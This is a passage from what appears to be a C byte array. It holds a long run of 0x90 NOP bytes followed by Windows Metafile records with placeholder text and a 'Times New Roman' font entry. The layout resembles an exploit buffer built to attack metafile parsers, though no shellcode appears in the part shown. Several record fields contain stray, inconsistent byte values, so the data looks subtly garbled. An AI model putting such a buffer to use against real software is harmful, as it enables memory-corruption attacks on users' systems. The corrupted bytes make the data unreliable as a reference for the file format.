    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x00,
    	0x09, 0x00, 0x04, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
    	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xA5, 0x01,
    	0x2A, 0x00, 0x09, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x00,
    	0x0A, 0xFB, 0x08, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x09, 0x00, 0x07, 0x00, 0x09, 0x00,
    	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
    	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x8A,
    	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x70, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x19, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xBB, 0x01, 0x2A, 0x00,
    	0x0C, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x20, 0x3D, 0x20, 0x77, 0x77, 0x77, 0x77, 0x77,
    	0x0C, 0x00, 0x0C, 0x00, 0x07, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0C, 0x00,
    	0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
    	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00,
    	0x32, 0x0A, 0xBB, 0x01, 0xA3, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00,
    	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
    	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
    	0x01, 0x00, 0x25, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xBB, 0x01, 0xA9, 0x00, 0x14, 0x00, 0x00, 0x00,
    	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
    	0x77, 0x77, 0x77, 0x20, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00,
    	0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00,
    	0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
    	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
    	0x04, 0xBE, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
    	0x3D, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xD1, 0x01, 0x2A, 0x00, 0x24, 0x00, 0x00, 0x00, 0x49, 0x20,
    	0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x42, 0x20, 0x3D, 0x20, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
    	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20,
    	0x42, 0x20, 0x07, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x09, 0x00,
    	0x05, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00,
    	0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x0A, 0x00,
    	0x06, 0x00, 0x04, 0x00, 0x0E, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00,
    	0x0A, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x0D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
    	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
    	0x00, 0x00, 0x32, 0x0A, 0xE8, 0x01, 0x2A, 0x00, 0x01, 0x00, 0x00, 0x00, 0x49, 0x00, 0x07, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
    	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
    	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x9F,
    	0x0A, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xE8, 0x01, 0x31, 0x00, 0x01, 0x00,
    	0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0xB0, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
    	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x30, 0x00, 0x00, 0x00, 0x32, 0x0A,
    	0xE8, 0x01, 0x37, 0x00, 0x1B, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
    	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
    	0x77, 0x77, 0x20, 0x00, 0x0C, 0x00, 0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x05, 0x00,
    	0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00,
    	0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x04, 0x00, 0x0C, 0x00,
    	0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
    	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x32, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x24, 0x00,
    	0x00, 0x00, 0x32, 0x0A, 0x06, 0x02, 0x2A, 0x00, 0x13, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77,
    	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x00,
    	0x07, 0x22, 0x0D, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00,
    	0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0xE9,
    	0x0A, 0x00, 0x06, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x7E, 0x01, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x15, 0x00, 0x00, 0x00, 0xFB, 0x02, 0xE5, 0xFF, 0x00, 0x00,
    	0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69,
    	0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x11,
    	0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x05, 0x00,
    	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
    	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x06, 0x02, 0xBE, 0x00, 0x09, 0x00,
    	0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00, 0x0D, 0x00, 0x0F, 0x00,
    	0x0E, 0x00, 0x0E, 0x00, 0x09, 0x00, 0x0D, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x15, 0x00,
    	0x00, 0x00, 0xFB, 0x02, 0xED, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00,
    	0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20,
    	0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x11, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x05, 0x00,
    	0x08, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x03, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
    	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00,
    	0x32, 0x0A, 0x06, 0x02, 0x2D, 0x01, 0x08, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
    	0x77, 0x20, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00,
    	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
    	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
    	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x1E, 0x02, 0x2A, 0x00,
    	0x05, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x20, 0x3D, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00,
    	0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x83,
    	0x59, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
    	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0xC3, 0x18, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x02, 0x57, 0x01, 0x00, 0x18, 0x00, 0x00, 0xF2, 0x32, 0x0A, 0x1E, 0x02,
    	0x60, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
    	0x77, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x08, 0x00, 0x05, 0x00, 0x09, 0x00,
    	0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
    	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00,
    	0x32, 0x0A, 0x1E, 0x02, 0xB8, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00,
    	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
    	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
    	0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0xCD, 0x0A, 0x1E, 0x02, 0xBE, 0x00, 0x06, 0x00, 0x00, 0x00,
    	0x31, 0x20, 0x77, 0x77, 0x77, 0x77, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x09, 0x00, 0x06, 0x00,
    	0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
    	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
    	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x1E, 0x02, 0xEF, 0x00,
    	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
    	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x22, 0x00, 0x00, 0x00,
    	0x32, 0x0A, 0x1E, 0x02, 0xF4, 0x00, 0x12, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
    	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x08, 0x00, 0x0A, 0x00,
    	0x0A, 0x00, 0x09, 0x00, 0x09, 0x00, 0x08, 0x00, 0x06, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00,
    	0x05, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0F, 0x00, 0x09, 0x00, 0x05, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
    	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
    	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x02, 0x01, 0x01, 0x00, 0x1B, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x2A, 0x00, 0x0D, 0x00,
    	0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00,
    	0x07, 0x00, 0x0F, 0x00, 0x0C, 0x00, 0x04, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00,
    	0x08, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x01, 0x00, 0x04, 0x87, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
    	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
    	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
    	0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x95, 0x00, 0x01, 0x00, 0x00, 0xE0, 0x2D, 0x00, 0x06, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x9F, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
    	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
    	0x00, 0x00, 0x00, 0x00, 0x04, 0xC6, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x02, 0x01, 0x01, 0x00, 0x24, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x9B, 0x00, 0x13, 0x00,
    	0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
    	0x77, 0x77, 0x77, 0x77, 0x20, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x04, 0x00,
    	0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0E, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00,
    	0x09, 0x00, 0x09, 0x00, 0x06, 0x00, 0xB8, 0x00, 0x08, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
    	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
    	0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0x2A, 0x00, 0x07, 0x00, 0x00, 0x00, 0x4A, 0x4E,
    	0x4B, 0x20, 0x3D, 0x20, 0x63, 0x00, 0x0A, 0x00, 0x0E, 0x00, 0x0E, 0x00, 0x05, 0x00, 0x0A, 0x00,
    	0x05, 0x00, 0x09, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
    	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
    	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
    	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02,
    	0x6D, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
    	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
